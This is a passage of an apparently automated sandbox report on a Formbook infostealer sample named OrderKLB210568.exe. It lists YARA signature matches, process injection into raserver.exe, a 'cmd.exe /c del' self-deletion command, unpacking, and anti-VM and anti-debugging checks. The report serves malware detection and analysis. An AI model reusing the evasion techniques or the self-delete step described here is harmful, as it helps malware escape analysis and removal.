          Source: 00000001.00000002.720216113.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.720216113.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.922695254.0000000001280000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.922695254.0000000001280000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000001.664276844.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000001.664276844.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.922550809.0000000001000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.922550809.0000000001000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.720881114.0000000000A00000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.720881114.0000000000A00000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.OrderKLB210568.exe.22b0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.OrderKLB210568.exe.22b0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.OrderKLB210568.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.OrderKLB210568.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.OrderKLB210568.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.OrderKLB210568.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.OrderKLB210568.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.OrderKLB210568.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.OrderKLB210568.exe.22b0000.3.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.OrderKLB210568.exe.22b0000.3.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.OrderKLB210568.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.OrderKLB210568.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/4@15/8
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 0_2_00404356 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 0_2_00402020 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6632:120:WilError_01
          Source: C:\Users\user\Desktop\OrderKLB210568.exeFile created: C:\Users\user\AppData\Local\Temp\nsq144A.tmpJump to behavior
          Source: OrderKLB210568.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\OrderKLB210568.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\OrderKLB210568.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: OrderKLB210568.exeReversingLabs: Detection: 32%
          Source: C:\Users\user\Desktop\OrderKLB210568.exeFile read: C:\Users\user\Desktop\OrderKLB210568.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\OrderKLB210568.exe 'C:\Users\user\Desktop\OrderKLB210568.exe'
          Source: C:\Users\user\Desktop\OrderKLB210568.exeProcess created: C:\Users\user\Desktop\OrderKLB210568.exe 'C:\Users\user\Desktop\OrderKLB210568.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\raserver.exe C:\Windows\SysWOW64\raserver.exe
          Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\OrderKLB210568.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\OrderKLB210568.exeProcess created: C:\Users\user\Desktop\OrderKLB210568.exe 'C:\Users\user\Desktop\OrderKLB210568.exe'
          Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\OrderKLB210568.exe'
          Source: C:\Users\user\Desktop\OrderKLB210568.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000004.00000000.712034262.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: OrderKLB210568.exe, 00000000.00000003.659659585.0000000009A30000.00000004.00000001.sdmp, OrderKLB210568.exe, 00000001.00000002.721198139.0000000000BAF000.00000040.00000001.sdmp, raserver.exe, 00000009.00000002.923390978.00000000051EF000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: OrderKLB210568.exe, raserver.exe
          Source: Binary string: RAServer.pdb source: OrderKLB210568.exe, 00000001.00000002.720929756.0000000000A30000.00000040.00000001.sdmp
          Source: Binary string: RAServer.pdbGCTL source: OrderKLB210568.exe, 00000001.00000002.720929756.0000000000A30000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000004.00000000.712034262.0000000005A00000.00000002.00000001.sdmp

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\user\Desktop\OrderKLB210568.exeUnpacked PE file: 1.2.OrderKLB210568.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 0_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress,
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 0_2_6FC42F60 push eax; ret
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00416251 pushad ; retf
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00416233 pushad ; retf
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_0040C2D9 push eax; retf
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00415B74 push ebp; iretd
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_0040C307 push eax; retf
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_0041B3B5 push eax; ret
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_0041B46C push eax; ret
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_0041B402 push eax; ret
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_0041B40B push eax; ret
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_0041CD5B push ecx; ret
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B0D0D1 push ecx; ret
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_1_00416251 pushad ; retf
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_1_00416233 pushad ; retf
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_1_0040C2D9 push eax; retf
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_1_00415B74 push ebp; iretd
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_1_0040C307 push eax; retf
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_1_0041B3B5 push eax; ret
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_1_0041B46C push eax; ret
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_1_0041B402 push eax; ret
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_1_0041B40B push eax; ret
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_1_0041CD5B push ecx; ret
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0514D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0100C307 push eax; retf
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01015B74 push ebp; iretd
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0101B3B5 push eax; ret
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01016233 pushad ; retf
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01016251 pushad ; retf
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0100C2D9 push eax; retf
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0101CD5B push ecx; ret
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0101B402 push eax; ret
          Source: C:\Users\user\Desktop\OrderKLB210568.exeFile created: C:\Users\user\AppData\Local\Temp\nsq144C.tmp\System.dllJump to dropped file
          Source: C:\Users\user\Desktop\OrderKLB210568.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
          Source: C:\Users\user\Desktop\OrderKLB210568.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\raserver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\OrderKLB210568.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\OrderKLB210568.exeRDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\raserver.exeRDTSC instruction interceptor: First address: 00000000010085E4 second address: 00000000010085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\raserver.exeRDTSC instruction interceptor: First address: 000000000100897E second address: 0000000001008984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\OrderKLB210568.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_004088B0 rdtsc
          Source: C:\Windows\explorer.exe TID: 5768Thread sleep time: -40000s >= -30000s
          Source: C:\Windows\SysWOW64\raserver.exe TID: 1284Thread sleep time: -46000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\raserver.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\raserver.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 0_2_00405E61 FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 0_2_0040548B CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 0_2_0040263E FindFirstFileA,
          Source: explorer.exe, 00000004.00000000.688063806.000000000A9D6000.00000004.00000001.sdmpBinary or memory string: War&Prod_VMware_SATA
          Source: explorer.exe, 00000004.00000000.681889045.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000004.00000000.686089155.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.682313880.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.686089155.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.678930816.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000004.00000000.686288903.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: explorer.exe, 00000004.00000000.681889045.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000004.00000000.681889045.00000000058C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000004.00000000.686368978.000000000A784000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: explorer.exe, 00000004.00000000.681889045.00000000058C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\OrderKLB210568.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\OrderKLB210568.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\raserver.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_004088B0 rdtsc
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00409B20 LdrLoadDll,
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 0_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress,
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AF90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AE20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AE20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AE20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AE20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AE20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AE20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AEF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AEF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AEF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AB9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B33884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B33884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AB58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AB40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AB40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AB40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B4B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B4B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B4B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B4B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B4B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B4B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AE002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AE002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AE002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AE002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AE002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00ACB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00ACB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00ACB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00ACB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B37016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B37016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B37016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B84015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B84015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B72073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B81074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AD0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AD0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B351BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B351BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B351BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B351BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AE61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AE61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B749A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B749A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B749A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B749A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B369A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AEA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00ADC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AE2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00ABB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00ABB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00ABB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B441E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AD4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AD4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AD4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AD4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AD4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AE513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AE513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AB9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AB9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AB9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00ABC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00ABB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00ABB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00ADB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00ADB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AB52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AB52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AB52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AB52A5 mov eax, dword ptr fs:[00000030h]
